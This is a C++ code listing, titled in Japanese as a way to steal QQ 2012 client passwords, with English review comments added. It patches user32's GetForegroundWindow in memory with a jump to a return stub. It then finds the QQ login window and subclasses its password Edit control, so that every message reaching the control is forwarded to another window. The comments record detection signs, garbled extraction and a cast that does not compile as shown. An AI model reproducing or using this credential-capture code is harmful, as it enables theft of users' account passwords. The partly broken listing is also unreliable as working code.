QQ 2012クライアントのパスワードを盗む


/*
 * CalePatchAddr - inline-patches user32!GetForegroundWindow in the calling process.
 *
 * The original header comment lost its non-ASCII text on extraction; only
 * "GetForegroundWindow" and "QQ" survive. Presumably it explained that the QQ
 * client consults the foreground window -- TODO confirm against the original page.
 *
 * What the visible code does:
 *   1. Resolves GetForegroundWindow in the already-loaded USER32.DLL.
 *   2. Allocates a private PAGE_EXECUTE_READWRITE region and copies a 5-byte
 *      stub into it (ret followed by four nops).
 *   3. Makes the first 5 bytes of the export writable and overwrites them with
 *      a relative jmp (0xE9 + rel32) to that stub.
 * After the patch, calls to GetForegroundWindow made in this process return
 * at once without running the real function, so the caller sees whatever
 * value happened to be in the return register.
 *
 * Review notes:
 *   - No API result is checked (GetModuleHandle, GetProcAddress, VirtualAlloc,
 *     VirtualProtect); the function returns TRUE unconditionally.
 *   - The (DWORD) pointer casts and the rel32 arithmetic assume 32-bit addresses.
 *   - The protection saved in oData is never restored and the original 5 bytes
 *     are not kept, so the code page stays writable+executable and this code
 *     cannot undo the patch.
 *   - Observable artifacts for detection: a private RWX allocation, a user32
 *     code page left PAGE_EXECUTE_READWRITE, and an export whose first byte is
 *     0xE9 with a target outside any loaded module. Comparing in-memory export
 *     prologues with the on-disk image exposes the overwrite.
 */

BOOL CalePatchAddr()
{
	// Address of the export inside this process's copy of user32.
	FARPROC FuncAddr = GetProcAddress(GetModuleHandle(_T("USER32.DLL")), "GetForegroundWindow");
	// Replacement body: return immediately; the nops only pad it to 5 bytes.
	byte HookCode[] = {0xC3/*ret*/, 0x90/*nop*/, 0x90, 0x90, 0x90};

	// Private executable+writable memory that holds the stub.
	LPVOID CodeAddr = VirtualAlloc(0, 5, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(CodeAddr, HookCode, 5);

	// Previous page protection is stored here but never restored.
	ULONG oData;
	VirtualProtect(FuncAddr, 5, PAGE_EXECUTE_READWRITE, &oData);
	byte NewCode[] = { 0xE9 /*jmp*/, 0, 0, 0, 0 };
	// rel32 displacement is measured from the end of the 5-byte jmp instruction.
	DWORD off = (DWORD)CodeAddr - (DWORD)FuncAddr - 5;

	memcpy(&NewCode[1], &off, 4);
	// Overwrites the export's first 5 bytes in place.
	memcpy(FuncAddr, NewCode, 5);

	return TRUE;
}

// Original window procedure of the subclassed Edit control: written by
// InstallHook, chained to by WndProc2.
WNDPROC pswd_proc = NULL;
// Window that WndProc2 forwards every intercepted message to. It is never
// assigned in the visible listing, so it stays NULL unless set elsewhere.
HWND recv_hwnd = NULL;

// Replacement window procedure installed on the password Edit control by
// InstallHook (the original comment here was garbled on extraction).
// Every message the control receives -- not just keyboard input -- is first
// copied to recv_hwnd and then passed to the saved original procedure, so the
// control keeps behaving normally for the user.
//
// Review note: for defenders, the visible effect is that the control's window
// procedure no longer points at the code that originally registered it; a
// client that re-reads and verifies that pointer can notice the subclassing.
LRESULT CALLBACK WndProc2(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
	// Synchronous copy of the message to the receiving window.
	SendMessage((HWND)recv_hwnd, message, wParam, lParam);
	// Chain to the original procedure and return its result unchanged.
	return ::CallWindowProc(pswd_proc, hWnd, message, wParam, lParam);
}
// Locates the QQ 2012 login window and subclasses its first Edit child so that
// WndProc2 sees every message sent to that control.
//
// Steps shown in the code:
//   - FindWindow for a top-level window of class "TXGuiFoundation" titled "QQ2012".
//   - FindWindowEx for the first child of class "Edit" (treated as the password box).
//   - Save the control's current window procedure in pswd_proc, then replace it
//     with WndProc2 through SetWindowLong(GWL_WNDPROC).
// A message box is shown and the function returns early if either window is missing.
//
// Review notes:
//   - The reinterpret_cast below has no target type as extracted (the
//     angle-bracket argument was most likely stripped with the page's HTML),
//     so the listing does not compile as shown.
//   - GetWindowLong/SetWindowLong with GWL_WNDPROC and the (long) cast assume
//     32-bit pointers; neither call's result is checked and `ret` is unused.
//   - Nothing in the listing restores the original procedure.
//   - Defensive takeaway: a password field built on a standard Edit control
//     can be found by class name and subclassed; a window procedure pointer
//     that changes after creation is the signal to check for.
void InstallHook()
{
	HWND QQ_hwnd = ::FindWindow(_T("TXGuiFoundation"), _T("QQ2012"));
	if (QQ_hwnd == NULL)
	{
		AfxMessageBox(_T("QQ not found!"));
		return;
	}

	HWND pswd_hwnd = FindWindowEx(QQ_hwnd, 0, _T("Edit"), 0);	// first "Edit" child; original note: MsgBox hwnd_qq_psw
	if (pswd_hwnd == NULL)
	{
		AfxMessageBox(_T("pswd HWND not found!"));
		return;
	}
	// Save the control's current window procedure so WndProc2 can chain to it
	// (original comment garbled on extraction).
	pswd_proc = reinterpret_cast(GetWindowLong(pswd_hwnd, GWL_WNDPROC));


	// Replace the window procedure; the previous value returned here is not used.
	long ret = SetWindowLong(pswd_hwnd, GWL_WNDPROC, (long)WndProc2);
}